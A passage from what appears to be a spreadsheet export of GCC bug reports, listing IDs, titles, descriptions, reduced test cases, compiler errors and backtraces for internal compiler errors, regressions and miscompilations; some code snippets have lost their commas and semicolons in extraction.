map.cc:28:10: note: void alloc::construct(alloc::pointer const T alloc::pointer = std::_Rb_tree_node &gt;*]
     void construct(pointer p const T }
          ^
map.cc:28:10: note:   candidate expects 2 arguments 4 provided
The problem is that stl_map.h uses piecewise construction for the pair object which calls alloc::construct with four arguments incorrectly assuming that all allocators in C++11 have a variadic construct() member.
It's easily fixed by changing the C++11 version of _M_create_node to use allocator_traits::construct:
                std::allocator_traits::
                    construct(_M_get_Node_allocator() __tmp
                              std::forward(__args)...)
(For 4.9 I was going to make all the RB-trees allocator-aware but this regression needs to be fixed for 4.8 without the rest of the allocator changes)</t>
  </si>
  <si>
    <t>GCC-69275</t>
  </si>
  <si>
    <t>ICE compiling rs6000/float-128.c</t>
  </si>
  <si>
    <t>With revision 232346 (ie Mike Meissner's last IEEE128 patch) we're now seeing the following ICE on powerpc64le-linux:
/home/bergner/gcc/build/gcc-fsf-mainline-cpu-supports-base/./gcc/xgcc -B/home/bergner/gcc/build/gcc-fsf-mainline-cpu-supports-base/./gcc/ -B/home/bergner/gcc/install/gcc-fsf-mainline-cpu-supports-base/powerpc64le-linux/bin/ -B/home/bergner/gcc/install/gcc-fsf-mainline-cpu-supports-base/powerpc64le-linux/lib/ -isystem /home/bergner/gcc/install/gcc-fsf-mainline-cpu-supports-base/powerpc64le-linux/include -isystem /home/bergner/gcc/install/gcc-fsf-mainline-cpu-supports-base/powerpc64le-linux/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -mlong-double-128 -mno-minimal-toc -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -mlong-double-128 -mno-minimal-toc -I. -I. -I../.././gcc -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/. -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/../gcc -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/../include -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/../libdecnumber/dpd -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/../libdecnumber -DHAVE_CC_TLS  -Wno-type-limits -mvsx -mfloat128 -mno-float128-hardware -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/soft-fp -I/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/config/rs6000  -o float128-ifunc.o -MT float128-ifunc.o -MD -MP -MF float128-ifunc.dep  -c /home/bergner/gcc/gcc-fsf-mainline-base/libgcc/config/rs6000/float128-ifunc.c -fvisibility=hidden -DHIDE_EXPORTS
/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/config/rs6000/float128-ifunc.c:282:8: error: ifunc is not supported on this target
 TFtype __addkf3 (TFtype TFtype)
        ^~~~~~~~
/home/bergner/gcc/gcc-fsf-mainline-base/libgcc/config/rs6000/float128-ifunc.c:285:8: error: ifunc is not supported on this target
 TFtype __subkf3 (TFtype TFtype)
        ^~~~~~~~
Mike I assume you bootstrapped using a POWER9 enabled (ie new) binutils when you tested the patch.  If I use an older binutils (eg 2.24 like on our genoa system) then we get the error above.</t>
  </si>
  <si>
    <t>GCC-54957</t>
  </si>
  <si>
    <t>Two crashes introduced by rev192488</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/viewcvs?view=revision&amp;revision=192488
sh4-unknown-linux-gnu no longer builds libgcc.
0x7df7df emit_cmp_and_jump_insn_1
	../../gcc/optabs.c:4273
0x7df7df emit_cmp_and_jump_insns(rtx_def* rtx_def* rtx_code rtx_def* machine_mode int rtx_def* int)
	../../gcc/optabs.c:4324
0x6136f6 do_compare_rtx_and_jump(rtx_def* rtx_def* rtx_code int machine_mode rtx_def* rtx_def* rtx_def* int)
	../../gcc/dojump.c:1072
0x61479b do_compare_and_jump
	../../gcc/dojump.c:1154
0x6164c1 do_jump_1(tree_code tree_node* tree_node* rtx_def* rtx_def* int)
	../../gcc/dojump.c:206
0x5ba1de expand_gimple_cond
	../../gcc/cfgexpand.c:1852
0x5c1b9b expand_gimple_basic_block
	../../gcc/cfgexpand.c:3832
0x5c2ec5 gimple_expand_cfg
	../../gcc/cfgexpand.c:4477
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
arm-unknown-linux-gnu (not EABI) crashes building libstdc++-v3 (compiling thread.cc)
Program received signal SIGSEGV Segmentation fault.
0x087696fb in emit_case_dispatch_table (index_expr=0x1121f18 
    index_type=0x1403c0 case_list=0xa7de974 default_label=0x125e18c 
    minval=0x12b690 maxval=0x12bbf4 range=0x12bbf4 stmt_bb=0x0)
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/stmt.c:1919
#0  0x087696fb in emit_case_dispatch_table (index_expr=0x1121f18 
    index_type=0x1403c0 case_list=0xa7de974 default_label=0x125e18c 
    minval=0x12b690 maxval=0x12bbf4 range=0x12bbf4 stmt_bb=0x0)
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/stmt.c:1919
#1  0x08769fab in expand_sjlj_dispatch_table (dispatch_index=0x125bc9c 
    dispatch_table=0xa7b2be0)
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/stmt.c:2292
#2  0x084deedd in sjlj_emit_dispatch_table (dispatch_label=0x125a924 
    num_dispatch=6)
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/except.c:1363
#3  0x084df160 in sjlj_build_landing_pads ()
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/except.c:1420
#4  0x084df5fe in finish_eh_generation ()
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/except.c:1454
#5  0x08430102 in gimple_expand_cfg ()
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/cfgexpand.c:4579
#6  0x086d148a in execute_one_pass (pass=0x9094900)
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/passes.c:2320
#7  0x086d1a4d in execute_pass_list (pass=0x9094900)
    at /builds/gnu-gcc-trunk/svn/arm-oabi/../gcc/passes.c:2381</t>
  </si>
  <si>
    <t>GCC-19764</t>
  </si>
  <si>
    <t>[3.4 regression] ICE on explicit instantiation of a non-template destructor</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE in gcc 3.3.x and 3.4.[34]:
======================================
struct A
template A::~A()
======================================
The error message on the 3.4 branch is:
bug.cc:2: error: `A' is not a template
bug.cc:2: error: expected id-expression before '~' token
bug.cc:2: error: abstract declarator `A' used as declaration
bug.cc:2: internal compiler error: tree check: expected class 'd' have 'x'
(error_mark) in do_decl_instantiation at cp/pt.c:10668
Please submit a full bug report [etc.]
We did not ICE in gcc 3.2.x.</t>
  </si>
  <si>
    <t>GCC-6539</t>
  </si>
  <si>
    <t>3.2 bootstrap failure on irix6.5 - fixproto</t>
  </si>
  <si>
    <t>3.2 bootstrap fails on irix6.5 with
fixproto: populating `include'
fix-header: fixing curses.h
fix-header: fixing pbmplus.h
fix-header: fixing X11/Xfuncs.h
/exd4/billingd/src/gcc-j/gcc/fixproto[275]: 65013269 Memory fault(coredump)
The failure was introduced on 28 April between 19:40 and 19:45 UTC by
2002-04-28  Neil Booth  
	* cppexp.c (lex): Update to use state.skip_eval.
	(struct op): Remove prio and flags members.
	(FLAG_BITS FLAG_MASK PRIO_SHIFT EXTRACT_PRIO EXTRACT_FLAGS
	SHORT_CIRCUIT RIGHT_ASSOC ..._PRIO op_to_prio): Remove.
	(LEFT_ASSOC): New macro.
	(optab): New table of operator priorities and flags.
	(SHIFT): Update.
	(_cpp_parse_expr): Clean up logic.  Return bool.  Use a
	malloc-ed parser stack.
	(reduce): New reduce the operator stack.
	(_cpp_expand_op_stack): Expand the operator stack as necessary.
	* cpphash.h (struct op): Predeclare.
	(struct cpp_reader): New members op_stack op_limit.
	(struct lexer_state): New member skip_eval.
	(_cpp_parse_expr): Update.
	(_cpp_expand_op_stack): New.
	* cpplib.c (do_if): Update.
	* cppinit.c (cpp_create_reader): Create op stack.
	(cpp_destroy): And destroy it.
	* cpplib.h (CPP_LAST_CPP_OP): Correct.
	(TTYPE_TABLE): Correct.
Release:
gcc 3.2
Environment:
mips-sgi-irix6.5
How-To-Repeat:
Bootstrap on irix6.5</t>
  </si>
  <si>
    <t>GCC-44536</t>
  </si>
  <si>
    <t>OMP: missing error with default(none)</t>
  </si>
  <si>
    <t>the following should give an error message like:
fortcom: Error: test.f90 line 5: Since the OpenMP DEFAULT(NONE) clause applies the PRIVATE SHARED REDUCTION FIRSTPRIVATE or LASTPRIVATE attribute must be explicitly specified for every variable.   [A]
  J=A(I)
----^
compilation aborted for test.f90 (code 1)
&gt; gfortran -c -fopenmp test.f90
&gt; cat test.f90
SUBROUTINE S1(aij)
  INTEGER DIMENSION(:) INTENT(IN) :: a
  INTEGER :: ij
!$OMP PARALLEL DEFAULT(NONE) SHARED(IJ)
  J=A(I)
!$OMP END PARALLEL
END SUBROUTINE</t>
  </si>
  <si>
    <t>GCC-23234</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in verify_flow_info()</t>
  </si>
  <si>
    <t>Following test program causes an internal compiler error
$ cat y.c
double func ( double a double b double c)
{
  double x0 x1 y0 y1
  int type = 0
  double ar
  if(b==0.0){
      x0 = -c/a
      return( x0 &gt; 1.0? 1.0 : ( x0 &lt; 0.0 ? 0.0: x0))
    }
  if(a==0.0) {
      y0 = -c/b
      return( y0 &gt; 1.0? 1.0 : ( y0 &lt; 0.0 ? 0.0: y0))
    }
  x0 = -c/a
  y0 = -c/b
  type = ((y0&gt;=1.0)
  switch(type){
  case 3: ar = (0.5*(y0+y1)) break
  }
   return ar
}
$ /opt/mline-20050802/bin/gcc -c -ffast-math -O2 y.c
$ y.c: In function Ã¢funcÃ¢:
y.c:2: error: control flow in the middle of basic block 0
y.c:2: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This test case works with gcc_cvs code till 20050801. This is also a reason to 
fail eon benchmark.</t>
  </si>
  <si>
    <t>GCC-1596</t>
  </si>
  <si>
    <t>setScale() missing from java.math.BigDecimal</t>
  </si>
  <si>
    <t>The setScale() method is not yet implemented in
java.math.BigDecimal.  (This is one of the last differences
from 1.1 I am aware of.)
Release:
20000108
How-To-Repeat:
Compile the example source file.</t>
  </si>
  <si>
    <t>warrenl</t>
  </si>
  <si>
    <t>GCC-30282</t>
  </si>
  <si>
    <t>Optimization flag -O1 -fschedule-insns2 cause red zone to be used when there is none</t>
  </si>
  <si>
    <t>Stack operating code that generated by gcc have an error. In some operating system that saved the thread's context in stack when schedule it will be have critical problem.
Enabling the compiler optimalisation (-O2 option) the error will be occuring and don't occur when using option -O1 or -O0.
--- sample ---
array.c:
int find_num(int i)
{
    const int arr[5] = {0 1 2 3 4}
    return arr[i]
}
using command:
  ppc-eabi-gcc -c -O2 array.c -o array.o
  ppc-eabi-objdump -S array.o
the disassemble code is:
00000000 :
   0:   3d 60 00 00     lis     r110
   4:   94 21 ff d0     stwu    r1-48(r1)
   8:   39 2b 00 00     addi    r9r110
   c:   81 0b 00 00     lwz     r80(r11)
  10:   80 e9 00 10     lwz     r716(r9)
  14:   54 63 10 3a     rlwinm  r3r32029
  18:   80 09 00 04     lwz     r04(r9)
  1c:   81 69 00 08     lwz     r118(r9)
  20:   81 49 00 0c     lwz     r1012(r9)
  24:   7d 21 1a 14     add     r9r1r3
  28:   91 01 00 10     stw     r816(r1)
  2c:   90 01 00 14     stw     r020(r1)
  30:   91 61 00 18     stw     r1124(r1)
  34:   91 41 00 1c     stw     r1028(r1)
  38:   90 e1 00 20     stw     r732(r1)
  3c:   38 21 00 30     addi    r1r148
  40:   80 69 00 10     lwz     r316(r9)
  44:   4e 80 00 20     blr
The instruction 3c let stack pointer back and instruction 40 load data from the stack this is error. The true code must be:
    lwz     r316(r9)
    addi    r1r148
And when you using option -O1 the code generated is true.
Release:
GCC v3.4.6 ppc-eabi cross compiler in cygwin
Environment:
Reading specs from /cygdrive/d/Compiler/gcc3.4.6-ppc-eabi/bin/../lib/gcc/ppc-eab
i/3.4.6/specs
Configured with: ../configure --target=ppc-eabi --prefix=/usr/local/gcc3.4.6-ppc
-eabi --enable-languages=c
Thread model: single
gcc version 3.4.6
How-To-Repeat:
Using my sample.</t>
  </si>
  <si>
    <t>chenkb</t>
  </si>
  <si>
    <t>GCC-16294</t>
  </si>
  <si>
    <t>[4.0 Regression] Missed delay slot scheduling opportunity</t>
  </si>
  <si>
    <t>The RTL prologue/epilogue patch for SPARC:
   http://gcc.gnu.org/ml/gcc-patches/2004-06/msg01049.html
introduced a regression with regard to delay slot scheduling and branches.
For the testcase:
void f (double*a int m)
{
  int j
  for(j=0 j&lt;m j++)
    a[j]=1
}
compiled at -O2 -mcpu=ultrasparc the diff looks like:
@@ -1210 +129 @@
 	.type	f #function
 	.proc	04
 f:
-	!#PROLOGUE# 0
-	!#PROLOGUE# 1
 	cmp	%o1 0
-	blepn	%icc .LL5
+	blepn	%icc .LL8
+	nop
 	sethi	%hi(.LLC0) %g1
 	mov	0 %o5
 	ldd	[%g1+%lo(.LLC0)] %f8
@@ -259 +249 @@
 	cmp	%o1 %o5
 	bgpt	%icc .LL4
 	std	%f8 [%o0+%g1]
-.LL5:
-	retl
-	nop
+.LL8:
+	jmp	%o7+8
+	 nop
 	.size	f .-f
 	.section	.rodata
 	.align 8
For testsuite/gcc.c-torture/compile/990517-1.c the diff is:
@@ -79 +77 @@
 	.type	sdbm__splpage #function
 	.proc	020
 sdbm__splpage:
-	!#PROLOGUE# 0
 	save	%sp -1168 %sp
-	!#PROLOGUE# 1
 	add	%fp -1056 %l6
 	mov	%i0 %o1
 	mov	1024 %o2
@@ -267 +248 @@
 	mov	1024 %o2
 	ldsh	[%fp-1056] %l4
 	cmp	%l4 0
-	blepn	%icc .LL1
+	blepn	%icc .LL10
+	nop
 	mov	1024 %l3
 	add	%fp -1064 %i5
 	add	%fp -1072 %l7
@@ -598 +588 @@
 	cmp	%l4 0
 	bgpt	%icc .LL4
 	add	%l5 4 %l5
-.LL1:
+.LL10:
 	return	%i7+8
-	nop
+	 nop
 	.size	sdbm__splpage .-sdbm__splpage
 	.ident	GCC: (GNU) 3.5.0 20040620 (experimental)
It appears that the compiler fails to realize that the value of the register
doesn't matter on the non-fallthru edge pointing to the return.</t>
  </si>
  <si>
    <t>GCC-21693</t>
  </si>
  <si>
    <t>private member is accessible by a derived class when declaring and defining classes in the same file</t>
  </si>
  <si>
    <t>In the following code the private member `n' of class `C' can be accessed by
derived class `D'.
The fact that g++ does not complain depends on the order of the declarations.
Typically moving the `C::n' initialization elsewhere in the code will trigger
(as expected) the following error:
$ error: `const int C::n' is private
//----------------------------------------------------
// private.cpp
#include 
class C {
private:
   static const int n
}
const int C::n = 9
class D : public C {
public:
   void print_n() { std::cout &lt;&lt; n= &lt;&lt; n &lt;&lt; \n }
} d
int main()
{
   d.print_n()
   return 0
}
//----------------------------------------------------
Additional information:
    * the exact version of GCC
    * the system type
    * the options given when GCC was configured/built
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.3.2/specs
Configured with: ../configure --prefix=/usr --libdir=/usr/lib
--with-slibdir=/lib --mandir=/usr/share/man --infodir=/usr/share/info
--enable-shared --enabl
e-threads=posix --disable-checking --enable-long-long --enable-__cxa_atexit
--enable-clocale=gnu --enable-languages=cc++adaf77objcjavapascal --host=i
586-mandrake-linux-gnu --with-system-zlib
Thread model: posix
gcc version 3.3.2 (Mandrake Linux 10.0 3.3.2-6mdk)
    * the complete command line that triggers the bug
g++ -Wall -Werror -ansi -pedantic -o private private.cpp &amp;&amp; ./private
    * the compiler output (error messages warnings etc.) and
none! It should complain that `const int C::n' is private</t>
  </si>
  <si>
    <t>sylvain.guilley</t>
  </si>
  <si>
    <t>GCC-31204</t>
  </si>
  <si>
    <t>wrong host association of implied loop variable</t>
  </si>
  <si>
    <t>With a recent gfortran the following compiles but generates the wrong results:
       MODULE mod
       INTEGER PARAMETER :: jmin(1:10) = (/ (i i = 1 10) /)
       CONTAINS
       SUBROUTINE one
         i = 99
       END SUBROUTINE
       SUBROUTINE two
         i=0
         CALL one
         IF (i.NE.0) CALL ABORT()
       END SUBROUTINE
       END MODULE
       USE MOD
       CALL two
       END</t>
  </si>
  <si>
    <t>GCC-82644</t>
  </si>
  <si>
    <t>Non-standard hypergeometric special functions defined in strict modes</t>
  </si>
  <si>
    <t>#define hyperg 1                                                                                                                                                                                                                                                                                                             
#include       
In C++17 this fails to compile:
hyper.cc:1:16: error: expected unqualified-id before numeric constant
 #define hyperg 1
                ^
hyperg is not a reserved name so we shouldn't be defining it for -std=c++17 only -std=gnu++17</t>
  </si>
  <si>
    <t>GCC-2991</t>
  </si>
  <si>
    <t>Bootstrap error (Forbidden identifiers: sparc sun unix)</t>
  </si>
  <si>
    <t>../gcc/configure --prefix=/usr/local/gcc --with-cpu=ultrasparc --enable-languages=c++objcf77
make CFLAGS=-O2 'LIBCFLAGS=-g -O2' 'LIBCXXFLAGS=-g -O2 -fno-implicit-templates' bootstrap
results in
...
make[3]: Entering directory `/export/home/ask/build/gcc-build/gcc/fixinc'
/bin/sh ../../../gcc/gcc/fixinc/genfixes machname.h
Forbidden identifiers: sparc sun unix 
cd ../../../gcc/gcc/fixinc  /bin/sh ./genfixes ../../../gcc/gcc/fixinc/fixincl.x
make[3]: *** [../../../gcc/gcc/fixinc/fixincl.x] Error 1
make[3]: Leaving directory `/export/home/ask/build/gcc-build/gcc/fixinc'
make[2]: *** [fixinc.sh] Error 2
make[2]: Leaving directory `/export/home/ask/build/gcc-build/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/export/home/ask/build/gcc-build/gcc'
make: *** [bootstrap] Error 2
Release:
3.1 (CVS on May 27 2001)
Environment:
SunOS iridium 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10</t>
  </si>
  <si>
    <t>GCC-14432</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Built-ins lead to conflict even if no header file included</t>
  </si>
  <si>
    <t>[Extracted from 14430] Consider this: 
-------------- 
struct Y {} 
Y y1 
-------------- 
There are no header files included yet we get from mainline and 3.4: 
g/x&gt; /home/bangerth/bin/gcc-3.5-pre/bin/c++ -c x.cc 
x.cc:2: error: declaration of `Y y1' 
:0: error: conflicts with previous declaration `double y1(double)' 
This is due to the fact that there is a built-in for the Bessel function y1. 
However it should certainly not be visible if no header files are included. 
That's the bug and it is a regression against 3.3.x. 
W.</t>
  </si>
  <si>
    <t>GCC-58467</t>
  </si>
  <si>
    <t>Documentation of the used variable attribute needs additional information</t>
  </si>
  <si>
    <t>The used variable attribute in the GCC documentation (gcc/doc/extend.texi section Variable Attributes) says that it can be attached to a variable.
However this attribute cannot be applied to auto variables only global or static variables.  If you try to attach __attribute__((used)) to an auto variable you'll get a confusing error saying that you can't do that with no reason why and the documentation doesn't provide any guidance.</t>
  </si>
  <si>
    <t>psmith</t>
  </si>
  <si>
    <t>GCC-44772</t>
  </si>
  <si>
    <t>[4.5 Regression] -Wc++-compat warns incorrectly for anonymous unions</t>
  </si>
  <si>
    <t>In GCC 4.5.0 the -Wc++-compat option prints a warning for anonymous unions in C code even though this code is correct C++ and is accepted by G++.
This is a regression from GCC 4.4.
$ gcc-4.5 -Wc++-compat -save-temps -c anon-union.c
anon-union.c:15:2: warning: using â€˜({anonymous})â€™ as both field and typedef name is invalid in C++
$ g++-4.5 -Wall -save-temps -c anon-union.c
[no error]
$ gcc-4.4 -Wc++-compat -save-temps -c anon-union.c
[no error]
$ cat anon-union.c
typedef enum {
        union_type_1
        union_type_2
} union_discriminator
typedef struct {
        union_discriminator discriminator
        union {
                int type1
                char* type2
        }
} struct_with_anon_union
struct_with_anon_union foo
$ gcc-4.5 -Wc++-compat -save-temps -v -c anon-union.c
Using built-in specs.
COLLECT_GCC=/home/jonathan/GCC/FSF/bin/gcc-4.5
COLLECT_LTO_WRAPPER=/home/jonathan/GCC/FSF/libexec/gcc/i486-linux-gnu/4.5.0/lto-wrapper
Target: i486-linux-gnu
Configured with: ../gcc-4.5.0/configure --enable-languages=cc++fortranobjcobj-c++ --prefix=/home/jonathan/GCC/FSF --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/home/jonathan/GCC/FSF/include/c++/4.5 --program-suffix=-4.5 --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-targets=all --disable-werror --with-arch-32=i486 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.5.0 (GCC)
COLLECT_GCC_OPTIONS='-Wc++-compat' '-save-temps' '-v' '-c' '-mtune=generic' '-march=i486'
 /home/jonathan/GCC/FSF/libexec/gcc/i486-linux-gnu/4.5.0/cc1 -E -quiet -v anon-union.c -mtune=generic -march=i486 -Wc++-compat -fpch-preprocess -o anon-union.i
ignoring nonexistent directory /home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/../../../../i486-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /home/jonathan/GCC/FSF/include
 /home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/include
 /home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-Wc++-compat' '-save-temps' '-v' '-c' '-mtune=generic' '-march=i486'
 /home/jonathan/GCC/FSF/libexec/gcc/i486-linux-gnu/4.5.0/cc1 -fpreprocessed anon-union.i -quiet -dumpbase anon-union.c -mtune=generic -march=i486 -auxbase anon-union -Wc++-compat -version -o anon-union.s
GNU C (GCC) version 4.5.0 (i486-linux-gnu)
        compiled by GNU C version 4.5.0 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (GCC) version 4.5.0 (i486-linux-gnu)
        compiled by GNU C version 4.5.0 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: cef540cf95bd7b1d645fe58566717d69
anon-union.c:15:2: warning: using â€˜({anonymous})â€™ as both field and typedef name is invalid in C++
COLLECT_GCC_OPTIONS='-Wc++-compat' '-save-temps' '-v' '-c' '-mtune=generic' '-march=i486'
 as -V -Qy --32 -o anon-union.o anon-union.s
GNU assembler version 2.20 (i486-linux-gnu) using BFD version (GNU Binutils for Ubuntu) 2.20
COMPILER_PATH=/home/jonathan/GCC/FSF/libexec/gcc/i486-linux-gnu/4.5.0/:/home/jonathan/GCC/FSF/libexec/gcc/i486-linux-gnu/4.5.0/:/home/jonathan/GCC/FSF/libexec/gcc/i486-linux-gnu/:/home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/:/home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/
LIBRARY_PATH=/home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/:/home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/../../../../lib/:/lib/../lib/:/usr/lib/../lib/:/home/jonathan/GCC/FSF/lib/gcc/i486-linux-gnu/4.5.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-Wc++-compat' '-save-temps' '-v' '-c' '-mtune=generic' '-march=i486'</t>
  </si>
  <si>
    <t>GCC-77454</t>
  </si>
  <si>
    <t>[7 Regression] IMM ERROR w/ -O2 and above</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160828 prints out IMM error when compiling the following reduced snippet:
void
oo (unsigned char co char fc)
{
  while (co != 0)
    {
      unsigned char *z4 = 
      int q3
      if (fc != 0)
        z4 = (unsigned char *)
      else if (fc + 1 != 0)
        z4 = (unsigned char *)
      for (co = 0 co &lt; 1 ++co)
        q3 = 0
      for (fc = 0 fc &lt; 3 ++fc)
        {
          fc = !!fc
          if (fc != 0)
            co = fc
        }
      if ((q3 != 0 ? -1 : *z4) &lt; (fc = q3))
        q3 = 1
    }
}
% x86_64-pc-linux-gnu-gcc-7.0.0-alpha20160828 -O2 -c lzfl5bs8.c 
 IMM ERROR : (use_p : tree - 0x39cdca962b8:0x39cdca91440)0
Despite this error it compiles the snippet successfully and generates correct code.
I get this error from time to time w/ different targets for the last several weeks at least. However it's the first file that I got which is way smaller then 100 kB.</t>
  </si>
  <si>
    <t>GCC-6165</t>
  </si>
  <si>
    <t>[i686] stack frame freed too early</t>
  </si>
  <si>
    <t>_ZNSt13basic_filebufIcSt11char_traitsIcEEC1Ev:
        ...
        movl    %ebp %esp      &lt;--- %esp == %ebp after here
        movl    $0 -16(%ebp)   &lt;--- WRONG EA = -16(%esp)
        movl    $0 -12(%ebp)   &lt;--- WRONG
        movl    $0 -24(%ebp)   &lt;--- WRONG
        movl    $0 -20(%ebp)   &lt;--- WRONG
Release:
3.0.4
Environment:
i686-linux
How-To-Repeat:
Compile with -O2 -mcpu=i686:
#include 
int main(void) {
        std::basic_filebuf foop
        return 0
}</t>
  </si>
  <si>
    <t>jseward</t>
  </si>
  <si>
    <t>GCC-3317</t>
  </si>
  <si>
    <t>GCC-MCORE: compiler for mcore-elf target fails to build</t>
  </si>
  <si>
    <t>Compiler fails to build. Tail of build log below:
../../gcc/gcc/libgcc2.c: In function `__subvsi3':
../../gcc/gcc/libgcc2.c:109: warning: implicit declaration of function `abort'
../../gcc/gcc/libgcc2.c:106: Internal compiler error in gen_rtx_SUBREG at emit-rtl.c:362
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0
Environment:
host: i686-linux (Red Hat 7.0)
target: mcore-elf
How-To-Repeat:
../gcc-3.0/configure --target=mcore-elf  make</t>
  </si>
  <si>
    <t>tm2</t>
  </si>
  <si>
    <t>GCC-21963</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE (seg fault) with -m64 (in IV-OPTS)</t>
  </si>
  <si>
    <t>Compiling this code:  
=========  
# 1 prob.F  
# 0   
# 1   
# 1 prob.F  
      SUBROUTINE XSHIF2 (AWORK)  
      COMMON /CNETIN/ IMAJMAKMA  
     1               IMAP2JMAP2KMAP2  
     2               IKBL0IKBL2JKBL2IJKBL0IJKBL2  
     3               JD2JD2P1IPOISSODJMAODIMA  
      COMMON /CRUNIN/ IUFIIULAIPFIIPLA  
     1               JVFIJVLAJPFIJPLA  
     2               KWFIKWLAKPFIKPLA  
     3               IUFIM1IULAP1IPFIM1IPLAP1  
     4               JVFIM1JVLAP1JPFIM1JPLAP1  
     5               KWFIM1KWLAP1KPFIM1KPLAP1  
     6               JKPFIJKWFI  
C  
      DIMENSION A(*)WORK(*)  
C  
      N = IMA*JMAP2*KMA+1  
      DO 10 I=IPLAIPFI-1  
        LI = (I-1)*JKBL2  
        DO 20 K=KPLAKPFI-1  
          LK  = (K-1)*JMAP2  
          LIK = LI + LK  
          N   = N - 2  
          DO 30 J=JPLAJPFI-1  
            N       = N - 1  
            WORK(J) = A(N)  
   30     CONTINUE  
          DO 31 J=JPLAJPFI-1  
            LIJK    = LIK + J  
            A(LIJK) = WORK(J)  
   31     CONTINUE  
   20   CONTINUE  
   10 CONTINUE  
C  
C---- END OF SUBROUTINE  X S H I F 2  
C  
      RETURN  
      END  
=========  
with:  
=========  
gfortran -Wall -Wextra -ffixed-line-length-0 -O1 -m64 -pedantic -c prob.F  
=========  
results in:  
=========  
prob.F: In function xshif2:  
prob.F:1: internal compiler error: Segmentation fault  
=========  
Output of gfortran -v:  
=========  
Using built-in specs.  
Target: x86_64-unknown-linux-gnu  
Configured with: ./configure --prefix=/home/vici --enable-languages=f95 :  
(reconfigured) ./configure --prefix=/home/vici --enable-languages=cf95  
--no-create --no-recursion : (reconfigured) ./configure --prefix=/home/vici  
--enable-languages=cf95 --enable-mapped-location : (reconfigured) ./configure  
--prefix=/home/vici --enable-mapped-location --enable-languages=cf95  
--no-create --no-recursion : (reconfigured) ./configure --prefix=/home/vici  
--enable-mapped-location --enable-languages=cf95 --no-create --no-recursion :  
(reconfigured) ./configure --prefix=/home/vici --enable-mapped-location  
--enable-languages=cf95 --no-create --no-recursion :  
(reconfigured) ./configure --prefix=/home/vici --enable-mapped-location  
--enable-languages=cf95 --no-create --no-recursion  
Thread model: posix  
gcc version 4.1.0 20050608 (experimental)  
=========  
Using -m32 works.  
The problem does not occur on 20050605. 
Victor</t>
  </si>
  <si>
    <t>fischer</t>
  </si>
  <si>
    <t>GCC-7122</t>
  </si>
  <si>
    <t>-o2 processed floating point code generates bogus NaN</t>
  </si>
  <si>
    <t>compiling with -o2 produces bogus floating point NaN. Same generated code may work right sometimes and not others.  Libraries (presumably built with this option) are affected including atof() sin() cos()
call to printf() appears to patch bug in some cases.
Release:
gcc 2.96 20000731 (redhat linux 7.1 2.96-98)
Environment:
redhat linux 7.2
cygwin
How-To-Repeat:
bug encountered developing http://www.calweb.com/~hanelyp/treecad/</t>
  </si>
  <si>
    <t>hanelyp</t>
  </si>
  <si>
    <t>GCC-25199</t>
  </si>
  <si>
    <t>crashing code output from -mtune=pentium4 but not -mtune=pentiumpro</t>
  </si>
  <si>
    <t>A fairly tricky one. OOo compiled with -mtune=pentium4 will crash e.g. http://qa.openoffice.org/issues/show_bug.cgi?id=58368 eventually on drawing stuff. Problem traced to a particular file. Compied with -mtune=pentiumpro instead and crash dissappears.
So taking -E code attached here as salgdi.ii comiling as 
a)
